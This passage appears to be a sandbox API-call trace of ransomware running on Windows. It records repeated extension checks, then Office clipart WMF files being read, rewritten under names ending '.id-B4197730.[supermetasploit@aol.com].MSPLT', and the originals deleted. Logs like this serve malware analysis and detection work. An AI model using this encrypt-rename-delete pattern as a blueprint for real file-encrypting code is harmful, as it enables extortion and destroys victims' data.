[0312.739] lstrlenW (lpString=".xls") returned 4 [0312.739] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.739] lstrlenW (lpString=".xlsx") returned 5 [0312.739] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.739] lstrlenW (lpString=".ppt") returned 4 [0312.739] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.739] lstrlenW (lpString=".zip") returned 4 [0312.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.740] lstrlenW (lpString=".rar") returned 4 [0312.740] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.740] lstrlenW (lpString=".bz2") returned 4 [0312.740] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.740] lstrlenW (lpString=".7z") returned 3 [0312.740] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.740] lstrlenW (lpString=".dbf") returned 4 [0312.740] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.740] lstrlenW (lpString=".1cd") returned 4 [0312.740] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.740] lstrlenW (lpString=".jpg") returned 4 [0312.740] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.741] lstrlenW (lpString=".doc") returned 4 [0312.741] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.741] lstrlenW (lpString=".docx") returned 5 [0312.741] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.741] lstrlenW (lpString=".pdf") returned 4 [0312.741] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.741] lstrlenW (lpString=".xls") returned 4 [0312.741] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.741] lstrlenW (lpString=".xlsx") returned 5 [0312.741] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.741] lstrlenW (lpString=".ppt") returned 4 [0312.741] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.741] lstrlenW (lpString=".zip") returned 4 [0312.741] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.741] lstrlenW (lpString=".rar") returned 4 [0312.741] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.741] lstrlenW (lpString=".bz2") returned 4 [0312.741] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.742] lstrlenW (lpString=".7z") returned 3 [0312.742] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.742] lstrlenW (lpString=".dbf") returned 4 [0312.742] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.742] lstrlenW (lpString=".1cd") returned 4 [0312.742] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.742] lstrlenW (lpString=".jpg") returned 4 [0312.743] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.743] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.743] lstrlenW (lpString="BS00444_.WMF") returned 12 [0312.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.745] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=3896) returned 1 [0312.745] CloseHandle (hObject=0x544) returned 1 [0312.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf")) returned 0x220 [0312.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.746] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.746] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0312.747] GetLastError () returned 0x0 [0312.747] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xf38, lpOverlapped=0x0) returned 1 [0313.198] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xf40, lpOverlapped=0x0) returned 1 [0313.200] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0313.201] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0313.201] SetEndOfFile (hFile=0x51c) returned 1 [0313.657] CloseHandle (hObject=0x51c) returned 1 [0313.657] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.658] SetEndOfFile (hFile=0x544) returned 1 [0313.662] CloseHandle (hObject=0x544) returned 1 [0313.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0313.999] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf")) returned 1 [0314.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.171] lstrlenW (lpString=".doc") returned 4 [0314.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.171] lstrlenW (lpString=".docx") returned 5 [0314.171] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.171] lstrlenW (lpString=".pdf") returned 4 [0314.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.171] lstrlenW (lpString=".xls") returned 4 [0314.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.171] lstrlenW (lpString=".xlsx") returned 5 [0314.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.171] lstrlenW (lpString=".ppt") returned 4 [0314.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.171] lstrlenW (lpString=".zip") returned 4 [0314.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.171] lstrlenW (lpString=".rar") returned 4 [0314.172] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString=".bz2") returned 4 [0314.172] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString=".7z") returned 3 [0314.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.172] lstrlenW (lpString=".dbf") returned 4 [0314.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.172] lstrlenW (lpString=".1cd") returned 4 [0314.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.172] lstrlenW (lpString=".jpg") returned 4 [0314.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.172] lstrlenW (lpString=".doc") returned 4 [0314.172] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString=".docx") returned 5 [0314.172] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.172] lstrlenW (lpString=".pdf") returned 4 [0314.172] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.172] lstrlenW (lpString=".xls") returned 4 [0314.173] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.173] lstrlenW (lpString=".xlsx") returned 5 [0314.173] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.173] lstrlenW (lpString=".ppt") returned 4 [0314.173] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.173] lstrlenW (lpString=".zip") returned 4 [0314.173] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.173] lstrlenW (lpString=".rar") returned 4 [0314.173] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.173] lstrlenW (lpString=".bz2") returned 4 [0314.173] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.173] lstrlenW (lpString=".7z") returned 3 [0314.173] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.173] lstrlenW (lpString=".dbf") returned 4 [0314.173] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.173] lstrlenW (lpString=".1cd") returned 4 [0314.173] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0314.173] lstrlenW (lpString=".jpg") returned 4 [0314.173] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.174] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.174] lstrlenW (lpString="BS01603_.WMF") returned 12 [0314.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.191] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=7176) returned 1 [0314.191] CloseHandle (hObject=0x3b0) returned 1 [0314.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf")) returned 0x220 [0314.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.198] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.198] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0314.200] GetLastError () returned 0x0 [0314.200] ReadFile (in: hFile=0x3b0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1c08, lpOverlapped=0x0) returned 1 [0314.202] WriteFile (in: hFile=0x460, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1c10, lpOverlapped=0x0) returned 1 [0314.205] ReadFile (in: hFile=0x3b0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.205] WriteFile (in: hFile=0x460, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0314.205] SetEndOfFile (hFile=0x460) returned 1 [0314.205] CloseHandle (hObject=0x460) returned 1 [0314.205] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.206] SetEndOfFile (hFile=0x3b0) returned 1 [0314.209] CloseHandle (hObject=0x3b0) returned 1 [0314.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf")) returned 1 [0314.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.210] lstrlenW (lpString=".doc") returned 4 [0314.210] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.210] lstrlenW (lpString=".docx") returned 5 [0314.210] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.210] lstrlenW (lpString=".pdf") returned 4 [0314.210] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.210] lstrlenW (lpString=".xls") returned 4 [0314.211] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.211] lstrlenW (lpString=".xlsx") returned 5 [0314.211] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.211] lstrlenW (lpString=".ppt") returned 4 [0314.211] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.211] lstrlenW (lpString=".zip") returned 4 [0314.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.211] lstrlenW (lpString=".rar") returned 4 [0314.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.211] lstrlenW (lpString=".bz2") returned 4 [0314.211] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.211] lstrlenW (lpString=".7z") returned 3 [0314.211] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.211] lstrlenW (lpString=".dbf") returned 4 [0314.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.211] lstrlenW (lpString=".1cd") returned 4 [0314.211] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.211] lstrlenW (lpString=".jpg") returned 4 [0314.211] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.212] lstrlenW (lpString=".doc") returned 4 [0314.212] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.212] lstrlenW (lpString=".docx") returned 5 [0314.212] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.212] lstrlenW (lpString=".pdf") returned 4 [0314.212] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.212] lstrlenW (lpString=".xls") returned 4 [0314.212] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.212] lstrlenW (lpString=".xlsx") returned 5 [0314.212] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.212] lstrlenW (lpString=".ppt") returned 4 [0314.212] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.212] lstrlenW (lpString=".zip") returned 4 [0314.212] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.212] lstrlenW (lpString=".rar") returned 4 [0314.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.213] lstrlenW (lpString=".bz2") returned 4 [0314.213] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.213] lstrlenW (lpString=".7z") returned 3 [0314.213] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.213] lstrlenW (lpString=".dbf") returned 4 [0314.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.213] lstrlenW (lpString=".1cd") returned 4 [0314.213] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0314.213] lstrlenW (lpString=".jpg") returned 4 [0314.213] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.215] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.215] lstrlenW (lpString="BS01636_.WMF") returned 12 [0314.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.217] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1874) returned 1 [0314.217] CloseHandle (hObject=0x3b0) returned 1 [0314.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf")) returned 0x220 [0314.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.218] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.218] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0314.220] GetLastError () returned 0x0 [0314.220] ReadFile (in: hFile=0x3b0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x752, lpOverlapped=0x0) returned 1 [0314.223] WriteFile (in: hFile=0x460, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x760, lpOverlapped=0x0) returned 1 [0314.225] ReadFile (in: hFile=0x3b0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.225] WriteFile (in: hFile=0x460, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0314.226] SetEndOfFile (hFile=0x460) returned 1 [0314.226] CloseHandle (hObject=0x460) returned 1 [0314.226] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.226] SetEndOfFile (hFile=0x3b0) returned 1 [0314.514] CloseHandle (hObject=0x3b0) returned 1 [0314.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0315.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf")) returned 1 [0315.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.074] lstrlenW (lpString=".doc") returned 4 [0315.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.074] lstrlenW (lpString=".docx") returned 5 [0315.074] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0315.074] lstrlenW (lpString=".pdf") returned 4 [0315.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.074] lstrlenW (lpString=".xls") returned 4 [0315.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.074] lstrlenW (lpString=".xlsx") returned 5 [0315.074] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0315.074] 